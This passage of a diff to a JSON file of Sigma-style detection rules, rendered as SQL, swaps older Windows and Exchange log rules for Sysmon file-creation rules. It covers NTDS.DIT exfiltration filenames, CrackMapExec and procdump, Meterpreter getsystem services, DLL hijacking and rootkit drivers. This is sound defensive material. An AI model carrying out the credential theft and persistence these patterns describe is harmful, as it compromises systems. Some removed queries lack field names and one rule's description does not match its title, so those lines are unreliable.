'%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))))" ], - "filename": "win_susp_ntlm_rdp.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "NTLM Brute Force", - "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": 
"3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects common NTLM brute force device names", - "author": "Jerry Shockley '@jsh0x'", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1110" + "attack.t1003.003" ], "falsepositives": [ - "Systems with names equal to the spoofed ones used by the brute force tools" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" ], - "filename": "win_susp_ntlm_brute_force.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "New Outlook Macro Created", + "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "@ScoubiMtl", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unknown" + "User genuinely creates a VB Macro for their email" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 
'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_office_outlook_macro_creation.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Suspicious Files in Default GPO Folder", + "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "author": "elhoim", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.t1036.005", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_susp_default_gpo_dir_write.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + 
"filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious desktop.ini Action", + "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "tags": [ "attack.persistence", - "attack.t1505.002" + "attack.t1547.009" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_susp_desktop_ini.yml" }, { - "title": "MSExchange Transport Agent Installation - Builtin", - "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "title": "TeamViewer 
Remote Session", + "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects the creation of log files during a TeamViewer remote session", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Legitimate uses of TeamViewer in an organisation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent.yml" + "filename": "file_event_win_susp_teamviewer_remote_session.yml" }, { - "title": "File Was Not Allowed To Run", - "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", - "status": "test", - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "author": "Pushkarev Dmitry", + "title": "OneNote Attachment File Dropped In Suspicious Location", + "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", + "status": "experimental", + "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. 
This could be a sign of attackers abusing OneNote attachments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" + "attack.defense_evasion" ], "falsepositives": [ - "Need tuning applocker or add exceptions in SIEM" + "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml" + "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" }, { - "title": "OpenSSH Server Listening On Socket", - "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "title": "Drop Binaries Into Spool Drivers Color Folder", + "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "status": "experimental", - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "author": "mdecrevoisier", + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.lateral_movement", - "attack.t1021.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrator activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" ], - "filename": "win_sshd_openssh_server_listening_on_socket.yml" + "filename": "file_event_win_susp_spool_drivers_color_drop.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", - "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", + "status": "experimental", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\Whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\Discord.exe' ESCAPE '\\' OR Image LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR Image LIKE '%\\\\msteams.exe' ESCAPE '\\' OR Image LIKE '%\\\\Slack.exe' ESCAPE '\\' OR Image LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "NetSupport Manager Service Install", - "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", - "status": "experimental", - "description": "Detects NetSupport Manager service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' 
AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_service_install_netsupport_manager.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "CrackMapExec File Creation Patterns", + "id": 
"9433ff9c-5d3f-4269-99f8-95fc826ea489", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR 
TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "status": "test", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Highly unlikely" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE 
'%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 